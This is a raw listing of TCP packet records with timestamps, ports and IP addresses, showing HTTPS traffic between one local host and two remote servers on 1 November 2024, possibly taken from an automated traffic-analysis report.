Nov 1, 2024 20:53:08.598351955 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.598542929 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.598547935 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.598701954 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.603575945 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.603585005 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.603758097 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.603904009 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.603910923 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.604190111 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.608596087 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.608603954 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.608787060 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.608844995 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.608850002 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.608984947 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.609065056 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.613389015 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.613396883 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.613627911 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.613636017 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.613692999 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.613810062 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.618501902 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.618510008 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.618736982 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.618745089 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.618814945 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.618892908 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.622879982 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.622888088 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.623168945 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.623176098 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.623224974 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.623380899 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.627643108 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.627650976 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.627825975 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.628022909 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.628027916 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.628245115 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.632101059 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.632108927 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.632334948 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.632334948 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.632481098 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.632486105 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.632509947 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.632708073 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.636884928 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.636893034 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.637106895 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.637106895 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.637115002 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.637221098 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.637391090 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.641299009 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.641633987 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.641887903 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.641887903 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.641940117 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.641944885 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.642055988 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.642175913 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.645807028 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.645814896 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.645966053 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.645966053 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.646032095 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.646039009 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.646115065 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.646294117 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.650659084 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.650666952 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.650779963 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.650964975 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.650970936 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.651036978 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.651181936 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.654500961 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.654509068 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.654630899 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.654813051 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.654818058 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.654994011 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.658473015 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.658480883 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.658621073 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.658621073 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.658699036 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.658701897 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.658881903 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.662645102 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.662653923 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.662885904 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.662892103 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.662950039 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.663067102 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.667330027 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.667337894 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.667495966 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.667604923 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.667612076 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.667783976 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.671526909 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.671535015 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.671746969 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.671753883 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.671776056 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.671906948 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.675014019 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.675021887 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.675143957 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.675306082 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.675311089 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.675368071 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.675456047 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.678955078 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.678962946 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.679225922 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.679233074 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.679290056 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.679383039 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.682681084 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.682688951 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.682893991 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.682899952 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.682956934 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.683176994 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.687239885 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.687247992 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.687427044 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.687531948 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.687536955 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.687773943 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.690901995 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.690910101 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.691066980 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.691251040 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.691256046 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.691431046 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.695528984 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.695537090 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.695748091 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.695754051 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.695827961 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.695946932 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.701360941 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.701368093 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.701598883 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.701606035 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.701670885 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.701756954 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.704996109 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.705003977 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.705163002 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.705200911 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.705200911 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.705205917 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.705327988 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.705497980 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.706717014 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.706724882 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.706854105 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.706855059 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.706948996 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.706954002 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.707083941 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.707204103 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.894371033 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.894381046 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.894428968 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.894484043 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.894575119 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.894630909 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.894632101 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.894644976 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.894690037 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.894917011 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.894927979 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.894933939 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.895016909 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.895025969 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.895343065 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.895351887 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.895458937 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.895467997 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.895879030 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.895967960 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.896044016 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.896291971 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.896395922 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.896828890 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.941745996 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.941756010 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.941792965 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.941845894 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.941863060 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.941976070 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.942065954 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.942087889 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.942404985 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.942509890 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.942883968 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.943022013 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.943047047 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.943240881 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.943242073 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.943366051 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.943470001 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.943618059 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.943808079 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.943818092 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.944010973 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.944339037 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.944382906 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.944431067 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.944782019 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.944789886 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.945003986 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.945343018 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.945350885 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.945431948 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.945769072 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.945981979 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.946330070 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.016627073 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.016635895 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.016669989 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.016726017 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.016741991 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.016838074 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.016868114 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.016876936 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.016971111 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.017075062 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.017139912 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.017163038 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.017529011 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.017721891 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.017724037 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.017725945 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.018064022 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.018074036 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.018155098 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.018510103 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.018520117 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.018701077 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.019042969 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.019052982 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.019131899 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.019480944 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.019675970 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.020001888 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.020108938 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.020471096 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.065800905 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.065809965 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.065843105 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.065896034 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.065915108 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.065974951 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:09.065975904 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.066203117 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.066256046 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.066360950 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.066550016 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.066636086 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.066987991 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.067308903 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:09.067318916 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:12.193880081 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.193916082 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.194021940 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.194325924 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.194341898 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.600433111 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.600830078 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.600842953 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.601771116 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.602020025 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.606532097 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.606636047 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.606739044 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.606756926 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.606861115 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.606878042 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.606906891 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.606959105 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.606976032 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.607016087 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.607024908 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.607032061 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.607259035 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.607268095 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.607278109 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.607449055 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.607461929 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.607619047 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.607630968 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.657897949 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.828433990 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.828459978 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.828488111 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.828727961 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.828739882 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.828886986 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.829826117 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.829935074 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:12.830125093 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.830297947 CET	49778	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:12.830307961 CET	443	49778	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.008095980 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.008575916 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.008629084 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.010318995 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.010819912 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.010922909 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.011253119 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.014861107 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.015041113 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.015208006 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.015261889 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.015424013 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.015475988 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.019514084 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.019798040 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.019804955 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.020065069 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.020065069 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.020065069 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.020298004 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.020438910 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.020688057 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.058900118 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.074482918 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.074482918 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.074522972 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.074538946 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.121356964 CET	49780	443	192.168.11.20	142.251.40.132
